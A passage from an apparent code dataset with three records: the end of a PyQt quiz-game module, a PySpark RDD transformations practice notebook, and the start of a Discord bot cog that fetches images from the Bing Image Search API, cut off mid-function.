2\r\n#*********************************************\r\n\r\ndef frame2():\r\n #score widget\r\n score = QLabel(str(parameters[\"score\"][-1]))\r\n score.setAlignment(QtCore.Qt.AlignRight)\r\n score.setStyleSheet(\r\n '''\r\n font-size: 35px;\r\n color: 'white';\r\n padding: 15px 10px;\r\n margin: 20px 200px;\r\n background: '#64A314';\r\n border: 1px solid '#64A314';\r\n border-radius: 35px;\r\n '''\r\n )\r\n widgets[\"score\"].append(score)\r\n\r\n #question widget\r\n question = QLabel(parameters[\"question\"][-1])\r\n question.setAlignment(QtCore.Qt.AlignCenter)\r\n question.setWordWrap(True)\r\n question.setStyleSheet(\r\n '''\r\n font-family: 'shanti';\r\n font-size: 25px;\r\n color: 'white';\r\n padding: 75px;\r\n '''\r\n )\r\n widgets[\"question\"].append(question)\r\n\r\n #answer button widgets\r\n button1 = create_buttons(parameters[\"answer1\"][-1], 85, 5)\r\n button2 = create_buttons(parameters[\"answer2\"][-1], 5, 85)\r\n 
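#answers 3 and 4 reuse the same left/right margin pattern so the two grid columns line up\r\n    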
button3 = create_buttons(parameters[\"answer3\"][-1], 85, 5)\r\n    button4 = create_buttons(parameters[\"answer4\"][-1], 5, 85)\r\n\r\n    widgets[\"answer1\"].append(button1)\r\n    widgets[\"answer2\"].append(button2)\r\n    widgets[\"answer3\"].append(button3)\r\n    widgets[\"answer4\"].append(button4)\r\n\r\n    #logo widget\r\n    image = QPixmap(\"logo_bottom.png\")\r\n    logo = QLabel()\r\n    logo.setPixmap(image)\r\n    logo.setAlignment(QtCore.Qt.AlignCenter)\r\n    logo.setStyleSheet(\"margin-top: 75px; margin-bottom: 30px;\")\r\n    widgets[\"logo\"].append(logo)\r\n\r\n    #place widgets on the grid\r\n    grid.addWidget(widgets[\"score\"][-1], 0, 1)\r\n    grid.addWidget(widgets[\"question\"][-1], 1, 0, 1, 2)\r\n    grid.addWidget(widgets[\"answer1\"][-1], 2, 0)\r\n    grid.addWidget(widgets[\"answer2\"][-1], 2, 1)\r\n    grid.addWidget(widgets[\"answer3\"][-1], 3, 0)\r\n    grid.addWidget(widgets[\"answer4\"][-1], 3, 1)\r\n    grid.addWidget(widgets[\"logo\"][-1], 4, 0, 1, 2)\r\n    \r\n\r\n#*********************************************\r\n# FRAME 3 - WIN GAME\r\n#*********************************************\r\n\r\ndef frame3():\r\n    #congratulations widget\r\n    message = QLabel(\"Congratulations! You\\nare a true programmer!\\n your score is:\")\r\n    message.setAlignment(QtCore.Qt.AlignRight)\r\n    message.setStyleSheet(\r\n        \"font-family: 'Shanti'; font-size: 25px; color: 'white'; margin: 100px 0px;\"\r\n    )\r\n    widgets[\"message\"].append(message)\r\n\r\n    #score widget\r\n    score = QLabel(\"100\")\r\n    score.setStyleSheet(\"font-size: 100px; color: #8FC740; margin: 0 75px 0px 75px;\")\r\n    widgets[\"score\"].append(score)\r\n\r\n    #go back to work widget\r\n    message2 = QLabel(\"OK. Now go back to WORK.\")\r\n    message2.setAlignment(QtCore.Qt.AlignCenter)\r\n    message2.setStyleSheet(\r\n        \"font-family: 'Shanti'; font-size: 30px; color: 'white'; margin-top:0px; margin-bottom:75px;\"\r\n    )\r\n    widgets[\"message2\"].append(message2)\r\n\r\n    #button widget\r\n    button = QPushButton('TRY AGAIN')\r\n    button.setStyleSheet(\r\n        \"*{background:'#BC006C'; padding:25px 0px; border: 1px solid '#BC006C'; color: 'white'; font-family: 'Arial'; font-size: 25px; border-radius: 40px; margin: 10px 300px;} *:hover{background:'#ff1b9e';}\"\r\n    )\r\n    button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n    button.clicked.connect(frame1)\r\n\r\n    widgets[\"button\"].append(button)\r\n\r\n    #logo widget\r\n    pixmap = QPixmap('logo_bottom.png')\r\n    logo = QLabel()\r\n    logo.setPixmap(pixmap)\r\n    logo.setAlignment(QtCore.Qt.AlignCenter)\r\n    logo.setStyleSheet(\r\n        \"padding :10px; margin-top:75px; margin-bottom: 20px;\"\r\n    )\r\n    widgets[\"logo\"].append(logo)\r\n\r\n    #place widgets on the grid\r\n    grid.addWidget(widgets[\"message\"][-1], 2, 0)\r\n    grid.addWidget(widgets[\"score\"][-1], 2, 1)\r\n    grid.addWidget(widgets[\"message2\"][-1], 3, 0, 1, 2)\r\n    grid.addWidget(widgets[\"button\"][-1], 4, 0, 1, 2)\r\n    grid.addWidget(widgets[\"logo\"][-1], 5, 0, 2, 2)\r\n\r\n\r\n#*********************************************\r\n# FRAME 4 - FAIL\r\n#*********************************************\r\ndef frame4():\r\n    #sorry widget\r\n    message = QLabel(\"Sorry, this answer \\nwas wrong\\n your score is:\")\r\n    message.setAlignment(QtCore.Qt.AlignRight)\r\n    message.setStyleSheet(\r\n        \"font-family: 'Shanti'; font-size: 35px; color: 'white'; margin: 75px 5px; padding:20px;\"\r\n    )\r\n    widgets[\"message\"].append(message)\r\n\r\n    #score widget\r\n    score = QLabel(str(parameters[\"score\"][-1]))\r\n    score.setStyleSheet(\"font-size: 100px; color: white; margin: 0 75px 0px 75px;\")\r\n
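    #parameters[\"score\"][-1] still holds the running total that is_correct() accumulated\r\n    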
widgets[\"score\"].append(score)\r\n\r\n #button widget\r\n button = QPushButton('TRY AGAIN')\r\n button.setStyleSheet(\r\n '''*{\r\n padding: 25px 0px;\r\n background: '#BC006C';\r\n color: 'white';\r\n font-family: 'Arial';\r\n font-size: 35px;\r\n border-radius: 40px;\r\n margin: 10px 200px;\r\n }\r\n *:hover{\r\n background: '#ff1b9e';\r\n }'''\r\n )\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.clicked.connect(frame1)\r\n\r\n widgets[\"button\"].append(button)\r\n\r\n #logo widget\r\n pixmap = QPixmap('logo_bottom.png')\r\n logo = QLabel()\r\n logo.setPixmap(pixmap)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\r\n \"padding :10px; margin-top:75px;\"\r\n )\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place widgets on the grid\r\n grid.addWidget(widgets[\"message\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"score\"][-1], 1, 1)\r\n grid.addWidget(widgets[\"button\"][-1], 2, 0, 1, 2)\r\n grid.addWidget(widgets[\"logo\"][-1], 3, 0, 1, 2)","repo_name":"eortegaa1500/NasaSpaceAppsChallenge","sub_path":"py_files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":27307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14751897238","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n##Narrow Transformations\ninput_list=[1,2,3,4]\n\n\n# In[ ]:\n\n\ninput_rdd=sc.parallelize(input_list,4)\ninput_rdd.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd.map(lambda x:x**2).collect()\n\n\n# In[ ]:\n\n\ndef power_list(x):\n return x**2\ninput_rdd.map(power_list).collect()\n\n\n# In[ ]:\n\n\ninput_list1=[\"Spark\",\"PySpark\",\"Python\",\"Hive\"]\ninput_rdd2=sc.parallelize(input_list1,4)\n\n\n# In[ ]:\n\n\ninput_rdd2.filter(lambda x:len(x)>=5).collect()\n\n\n# In[ ]:\n\n\nprint([i for i in input_list1 if len(i)>=5])\n\n\n# In[ ]:\n\n\nitera=list(filter(lambda x:len(x)>5,input_list1))\n\n\n# In[ ]:\n\n\nitera\n\n\n# In[ ]:\n\n\nlist(map(lambda x: len(x)>=5,input_list1))\n#map(lambda x: 'lower' if x < 3 else 'higher', lst)\n\n\n# In[ ]:\n\n\ndef more_than(x):\n if len(x)>=5:\n return x\ninput_rdd2.map(more_than).collect()\n \n\n\n# In[ ]:\n\n\ndef more_than_filter(x):\n if len(x)>=5:\n return x\ninput_rdd2.filter(more_than_filter).collect()\n\n\n# In[ ]:\n\n\ninput_rdd2.map(lambda x:len(x)>=5).collect()\n\n\n# In[ ]:\n\n\ndef filter_def(x):\n if len(x)>=5:\n return x\ndef map_def(x):\n x+=\" in Big Data\"\n return x\ninput_rdd2.filter(filter_def).map(map_def).collect()\n\n\n# In[ ]:\n\n\ninput_rdd2.filter(lambda x:len(x)>=5).map(lambda x:x+\" in Big Data\").collect()\n\n\n# In[ ]:\n\n\ninput_2d_list=[[\"Spark\",\"Scala\",\"PySpark\"],[\"Python\",\"Java\",\"CPP\"],[\"Spring Boot\",\"Flask\",\"Django\"]]\n\n\n# In[ ]:\n\n\ninput_rdd3=sc.parallelize(input_2d_list)\n\n\n# In[ ]:\n\n\ninput_rdd3.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd3.flatMap(lambda x:x).collect()\n\n\n# In[ ]:\n\n\ninput_rdd3.flatMap(lambda x:x).count()\n\n\n# In[ ]:\n\n\ninput_rdd3.map(lambda x:x).collect()\n\n\n# In[ ]:\n\n\ninput_rdd3.map(lambda x:x).count()\n\n\n# In[ ]:\n\n\nlen(input_rdd3.flatMap(lambda x:x).collect())\n\n\n# In[ ]:\n\n\n#flatMap reduces the dimensions of the datastructure while map doesnt reduce the dimensions of the data structure\n\n\n# In[ ]:\n\n\n#Wide Transformations\n\n\n# In[ ]:\n\n\ninput_list_4=[1,2,3,4,4,3,2,1]\ninput_rdd4=sc.parallelize(input_list_4,4)\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().collect()\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().count()\n\n\n# In[ ]:\n\n\nlen(input_rdd4.distinct().collect())\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().take(input_rdd4.distinct().count())\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().takeOrdered(len(input_rdd4.collect()),key=None)\n\n\n# In[ ]:\n\n\ninput_rdd4.repartition(8)\n\n\n# In[ ]:\n\n\ninput_rdd4.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd4.repartition(2)\n\n\n# In[ ]:\n\n\ninput_rdd4.getNumPartitions()\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('sh', 'pwd')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls /FileStore/')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls /user/')\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\ndbutils.fs.put(\"abcd5.txt\",\"Teja\",False)\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\ninput_Rdd=sc.textFile('/abcd.txt')\n\n\n# In[ ]:\n\n\ninput_Rdd.collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', \"ls '/FileStore/'\")\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', \"ls '/FileStore/tables/'\")\n\n\n# In[ 
]:\n\n\ninput_Rdd1=sc.textFile('/FileStore/tables/spark-3.txt')\n\n\n# In[ ]:\n\n\ninput_Rdd1.collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\ninput_Rdd3=sc.textFile('/FileStore/tables/spark-2.txt',3)\n\n\n# In[ ]:\n\n\ninput_Rdd3.collect()\n\n\n# In[ ]:\n\n\ninput_Rdd1.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_Rdd3.getNumPartitions()\n\n\n# In[ ]:\n\n\n#Pair RDD\ninput_Pair=[(1,2),(2,4),(3,6),(4,8)]\ninput_Pair_RDD=sc.parallelize(input_Pair)\n\n\n# In[ ]:\n\n\ninput_Pair_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_Pair_RDD.mapValues(lambda a:a*10).collect()\n\n\n# In[ ]:\n\n\ndef multily(a):\n return a*10\ninput_Pair_RDD.mapValues(multily).collect()\n\n\n# In[ ]:\n\n\ndef multiply(a):\n return a*10\n \ninput_Pair_RDD.mapValues(multiply).collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/')\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/FileStore')\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/FileStore/tables/')\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\nPair_list_1=[(\"Python\",\"OOPS\"),(\"Java\",\"OOPS\"),(\"Java\",\"SpringBoot\"),(\"Python\",\"FLASK\")]\nPair_list_2=[(\"Python\",\"PySpark\"),(\"Java\",\"Scala\"),(\"Java\",\"Hibernate\"),(\"Python\",\"AI\")]\n\nPair_RDD_1=sc.parallelize(Pair_list_1)\nPair_RDD_2=sc.parallelize(Pair_list_2)\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.count()\n\n\n# In[ ]:\n\n\nPair_RDD_2.count()\n\n\n# In[ ]:\n\n\nPair_RDD_1.getNumPartitions()\n\n\n# In[ ]:\n\n\nPair_RDD_1.reduceByKey(lambda a,b:b+\" Learning\",numPartitions=4).collect()\n\n\n# In[ ]:\n\n\ndef reducing(a,b):\n return b+\" Learning\"\nPair_RDD_1.reduceByKey(reducing,numPartitions=8).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\ndef multiply_1(a):\n return a*10\ndef filtering(b):\n return b[1]>50\ninput_Pair_RDD.mapValues(multiply_1).filter(filtering).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.getNumPartitions()\n\n\n# In[ ]:\n\n\nPair_RDD_1.reduceByKey(lambda acc,n:acc+\" & \"+n).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.reduceByKey(lambda acc,n:acc+\" & \"+n).collect()\n\n\n# In[ ]:\n\n\ndef Joining(acc,n):\n return acc+\" & \"+n\n \nPair_RDD_1.reduceByKey(Joining).collect()\n\n\n# In[ ]:\n\n\ndef Joining_1(acc,N):\n return acc+\" ^ \"+N+\" Learning\"\nPair_RDD_2.reduceByKey(Joining_1).collect()\n\n\n# In[ ]:\n\n\ninitial_Value=0\nsc.accumulator(initial_Value).value\n\n\n# In[ ]:\n\n\ndef joining_using_ACC(initial_Value,N):\n return initial_Value+\" ACC \"+N\nPair_RDD_2.reduceByKey(joining_using_ACC).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.distinct().collect()\n\n\n# In[ ]:\n\n\nPair_RDD_3=sc.parallelize([(1,2),(1,2),(2,4),(2,5),(3,6),(4,5)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_3.distinct().collect()\n\n\n# In[ ]:\n\n\nPair_RDD_3.count()\n\n\n# In[ ]:\n\n\nPair_RDD_3.distinct().reduceByKey(lambda acc,n:acc+n).collect()\n\n\n# In[ ]:\n\n\ndef check(a):\n return a[1]>5\nPair_RDD_3.distinct().reduceByKey(lambda acc,n:acc+n).filter(check).collect()\n\n\n# In[ ]:\n\n\ndef redu(a,b):\n return b+\" & \"+a\nPair_RDD_2.reduceByKey(redu).collect()\n\n\n# In[ ]:\n\n\nfrom functools import reduce\nl=[1,2,3]\ndef add_num(a,b):\n return a+b\nreduce(add_num,l)\n\n\n# In[ ]:\n\n\ninterset_1=[1,2,3,4,5,6,7]\ninput_RDD1=sc.parallelize(interset_1,4)\ninterset_2=[7,8,9,10,5,4,3,2,1]\ninput_RDD2=sc.parallelize(interset_2,4)\n\n\n# In[ ]:\n\n\ninput_RDD1.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD2.getNumPartitions()\n\n\n# In[ 
]:\n\n\ninput_RDD1.intersection(input_RDD2).collect()\n\n\n# In[ ]:\n\n\ninput_RDD1.intersection(input_RDD2).count()\n\n\n# In[ ]:\n\n\ninput_RDD3=sc.parallelize([1,2,3,4,5,4,3,2,1],4)\ninput_RDD4=sc.parallelize([2,3,4,5,1,2,3,4],4)\ninput_RDD3.intersection(input_RDD4).collect()\n\n\n# In[ ]:\n\n\ninput_RDD3.intersection(input_RDD4).count()\n\n\n# In[ ]:\n\n\ninput_RDD5=sc.parallelize([\"Java\",\"Python\",\"Spring Boot\",\"Flask\",\"Django\"],4)\ninput_RDD6=sc.parallelize([\"Flask\",\"Django\",\"Spring\"],4)\ninput_RDD5.intersection(input_RDD6).filter(lambda a:len(a)>5).collect()\n\n\n# In[ ]:\n\n\n#Joins\ninput_Join_1=sc.parallelize([1,2,3,4],4)\ninput_Join_2=sc.parallelize([5,6,7,8],4)\n\n\n# In[ ]:\n\n\ninput_Join_3=sc.parallelize([(1,2),(3,4)],4)\ninput_Join_4=sc.parallelize([(1,4),(1,5),(3,8)],4)\n\n\n# In[ ]:\n\n\ninput_Join_3.join(input_Join_4).collect()\n\n\n# In[ ]:\n\n\ndef appending(a):\n ans=[]\n for i in a:\n ans.append(\"Learning \"+i)\n return tuple(ans)\n \ninput_Join_5=sc.parallelize([(\"Java\",\"Scala\"),(\"Python\",\"Flask\")],4)\ninput_Join_6=sc.parallelize([(\"Java\",\"Spring\"),(\"Python\",\"Big Data\")],4)\n\ninput_Join_5.join(input_Join_6).mapValues(appending).collect()\n\n\n# In[ ]:\n\n\n\ninput_Join_7=sc.parallelize([(5,50),(6,60),(5,70)],4)\ninput_Join_8=sc.parallelize([(5,80),(6,90),(6,100)],4)\n\ninput_Join_7.join(input_Join_8).collect()\n\n\n# In[ ]:\n\n\ndef f(a):\n ans=[]\n for i in a:\n ans.append(i+100)\n return tuple(ans)\ninput_Join_7.join(input_Join_8).mapValues(f).collect()\n\n\n# In[ ]:\n\n\n#Left Join\ninput_Join_7.collect()\n\n\n# In[ ]:\n\n\ninput_Join_8.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9=input_Join_8.union(sc.parallelize([(9,90),(10,100)],4))\ninput_Join_9.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.leftOuterJoin(input_Join_7).collect()\n\n\n# In[ ]:\n\n\ninput_Join_10=input_Join_7.union(sc.parallelize([(120,130),(140,150)],4))\ninput_Join_9.rightOuterJoin(input_Join_10).collect()\n\n\n# In[ ]:\n\n\ninput_Join_10.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.groupWith(input_Join_10).collect()\n\n\n# In[ ]:\n\n\ninput_L1=[(1,2),(1,4),(2,6)]\ninput_L2=[(1,8),(3,10),(3,20)]\ninput_L1_RDD=sc.parallelize(input_L1,4)\ninput_L2_RDD=sc.parallelize(input_L2,4)\n\n\n# In[ ]:\n\n\ninput_L1_RDD.join(input_L2_RDD).collect()\n\n\n# In[ ]:\n\n\ninput_L1_RDD.leftOuterJoin(input_L2_RDD).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n return sum(list(a))+sum(list(b))\n\ninput_L1_RDD.leftOuterJoin(input_L2_RDD).reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n return sum(list(a))+sum(list(b))\nfinal_list=input_L1_RDD.leftOuterJoin(input_L2_RDD).reduceByKey(f).collect()\nans=[]\nfor i in final_list:\n if type(i[1]) is tuple:\n ans.append((i[0],i[1][0]))\n else:\n ans.append(i)\nprint(ans)\n\n\n# In[ ]:\n\n\nPair_RDD_1=sc.parallelize([(\"Python\",4),(\"Java\",3),(\"Python\",5),(\"java\",4)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2=sc.parallelize([(\"Python\",10),(\"Java\",8)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\ndef a(a):\n ans=[]\n for i in a:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\ndef a(a):\n ans=[]\n for i in a:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda x:x).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMap(lambda a:a).collect()\n\n\n# In[ 
]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n z=[]\n z.append(a)\n z.append(b)\n return z\nPair_RDD_1.reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\ndef a(ab):\n ans=[]\n for i in ab:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\ndef ab(a,b):\n z=[]\n z.append(list((a,b)))\n return z\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n a.extend(b)\n return a\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).reduceByKey(f).mapValues(lambda a:sum(a)).collect()\n\n\n# In[ ]:\n\n\ninput_list=[(\"Kohli\",10),(\"virat\",20),(\"dhoni\",40),(\"virat\",50),(\"dhoni\",60)]\ninput_RDD=sc.parallelize(input_list,4)\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\n\ninput_RDD.groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe('cat').collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe('ls').collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe(\"pwd\").collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe(\"pwd\").take(1)\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ninput_RDD.reduceByKey(lambda a,b:a+b).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\n\n\n# In[ ]:\n\n\ndef first(a):\n return [a]\ndef second(a,b):\n a.append(b)\n return a\ndef third(a,b):\n a.extend(b)\n return a\ninput_RDD.combineByKey(first,second,third).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ndef first(a):\n return (a,1)\ndef second(a,b):\n return a[0]+b,a[1]+1\ndef third(a,b):\n return (a[0]+b[0],a[1]+b[1])\ninput_RDD.combineByKey(first,second,third).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.combineByKey(first,second,third).mapValues(lambda a:a[0]/a[1]).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD.repartition(5)\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD.coalesce(5)\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ndef first(a):\n return (a,1)\ndef second(a,b):\n return a[0]+b,a[1]+1\ndef third(a,b):\n return (a[0]+b[0],a[1]+b[1])\nimport time\nbegin=time.time()\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\nend=time.time()\nexec_time=end-begin\nprint(exec_time)\nbegin_1=time.time()\ninput_RDD.combineByKey(first,second,third).mapValues(lambda a:a[0]/a[1]).collect()\nend_1=time.time()\nexec_time_1=end_1-begin_1\nprint(exec_time_1)\n\n\n# In[ 
]:\n\n\ninput_RDD.repartition(2).getNumPartitions()\n\n\n# In[ ]:\n\n\nimport time\nrepartition_time_begin=time.time()\nprint(input_RDD.repartition(2).getNumPartitions())\nrepartition_time_end=time.time()\nrepartition_time=repartition_time_end-repartition_time_begin\ncoalesce_time_begin=time.time()\nprint(input_RDD.coalesce(2).getNumPartitions())\ncoalesce_time_end=time.time()\ncoalesce_time=coalesce_time_end-coalesce_time_begin\nprint(repartition_time)\nprint(coalesce_time)\n\n\n# In[ ]:\n\n\ndef second(a,b):\n return a+b\ndef third(a,b):\n return a+b\ninput_RDD.aggregateByKey((0),second,third).collect()\n\n\n# In[ ]:\n\n\nword_list=[(\"hello\",1),(\"world\",1),(\"hello\",1)]\nword_RDD=sc.parallelize(word_list,4)\nword_RDD.reduceByKey(lambda a,b:a+b).collect()\n\n\n# In[ ]:\n\n\ninput_str=\"I am new to Hadoop Hadoop is a Distributed Hadoop is a ecosystem\"\ninput_list=input_str.split()\ninput_tu=[(i,1) for i in input_list]\nprint(input_tu)\n\n\n# In[ ]:\n\n\nword_RDD_1=sc.parallelize(input_tu,4)\nword_RDD_1.reduceByKey(lambda a,b:a+b).takeOrdered(2)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"phaniteja5789/SparkRDD","sub_path":"RDD/Transformations_Practice.py","file_name":"Transformations_Practice.py","file_ext":"py","file_size_in_byte":13889,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19554246796","text":"\"\"\"Query cog module.\n\nThe query cog contains methods and attributes used to async query the\nBing Image Search API V7.0 for images based on a query string and some\ndefined parameters. \n\"\"\"\n\n# Standard Library imports\nimport aiohttp\nfrom io import BytesIO\nimport os\nfrom dotenv import load_dotenv\n# Discord and discord extension library imports\nimport discord\nfrom discord.ext import commands\n\n\nclass Query(commands.Cog):\n \"\"\"Class that defines an image request cog.\n\n Creates an image search request and async sends it to the Bing Image\n Search V7.0 API in response to user request. Must be loaded before\n the Editor cog in order to provide it with the selected image.\n \"\"\"\n\n def __init__(\n self, bot, mkt='en-US', result_count=5, \n moderation='Moderate', minDim=(120, 120), \n maxDim=(1024, 1024)):\n \"\"\"Init method for the Query cog\"\"\"\n self.bot = bot\n\n load_dotenv()\n self.api_key = os.getenv('BS_API_KEY')\n self.endpoint = os.getenv('END_POINT') + \"v7.0/images/search\"\n \n self.query = None\n self.market = mkt\n self.result_count = result_count\n self.offset = 0\n self.moderation = moderation\n self.minDim = minDim\n self.maxDim = maxDim\n\n self.params = {\n 'q': self.query, 'mkt': self.market, 'count': self.result_count, \n 'offset': self.offset,'safeSearch': moderation,\n 'minWidth': minDim[0], 'minHeight': minDim[1], \n 'maxWidth': maxDim[0], 'maxHeight': maxDim[1]\n }\n \n self.url_list = None\n self.img_list = None\n self.selected_image = None\n\n async def cog_check(self, ctx):\n \"\"\"Cog level context checker.\n \n Is called and evaluated whenever a command is mentioned.\n Checks whether the command has been used in a dm channel.\n \"\"\"\n if isinstance(ctx.channel, discord.DMChannel): return True\n else: return False\n\n @commands.group(name='find', \n help=\"Finds and returns images based on a descriptive query.\",\n invoke_without_command=True)\n async def find(self, ctx, *, arg: str):\n \"\"\" Finds images based on the query param \"\"\"\n\n headers = {'Ocp-Apim-Subscription-Key': self.api_key}\n self.query = arg\n self.update_params()\n if self.query is not None:\n await ctx.send(\"Finding image results for \" + arg + \". 
Please wait...\")\n            # Calls the API\n            async with aiohttp.ClientSession() as session:\n                async with session.get(self.endpoint, headers=headers, params=self.params) as response:\n                    #image_urls = []\n                    if response.status == 200:\n                        search_results = await response.json()\n                        self.url_list = [img[\"contentUrl\"] for img in search_results[\"value\"][:self.result_count]]\n                    else:\n                        self.url_list = None\n                await session.close()\n            if self.url_list is not None:\n                self.img_list = []\n                async with aiohttp.ClientSession() as session:\n                    for i in range(self.result_count):\n                        async with session.get(self.url_list[i]) as image_data:\n                            if image_data.status == 200:\n                                image_bytes = BytesIO(await image_data.read())\n                                if image_bytes is not None:\n                                    await ctx.send(file=discord.File(image_bytes, str(i + 1) + '.jpg'))\n                                    print(image_bytes)\n                                    self.img_list.append(image_bytes)\n                            else:\n                                self.img_list.append(None)\n                                await ctx.send(\"An unexpected error occurred while retrieving this image.\")\n                    await session.close()\n    \n    @find.command(name='more', \n        help=\"Command used to find more images for the same query.\")\n    async def find_more(self, ctx, *, arg):\n        pass\n    \n    @commands.command(name='select', help=\"Command used to select one of the images for editing.\")\n    async def select(self, ctx, choice: int):\n        if self.img_list is not None:\n            if choice > 0 and choice <= self.result_count:\n                # +1 and -1 